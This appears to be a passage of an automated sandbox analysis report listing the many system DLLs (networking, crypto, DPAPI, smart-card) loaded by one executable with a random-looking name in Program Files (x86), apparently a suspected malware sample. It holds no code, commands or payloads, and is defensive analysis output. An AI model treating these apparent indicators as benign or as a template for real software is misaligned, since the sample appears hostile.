Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: winscard.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: devobj.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sensapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: winscard.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: devobj.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sensapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: winscard.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: devobj.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sensapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: winscard.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: devobj.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sensapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: schannel.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dpapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: ncryptsslp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: winscard.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: devobj.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sensapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: winscard.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: devobj.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sensapi.dll
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iphlpapi.dll
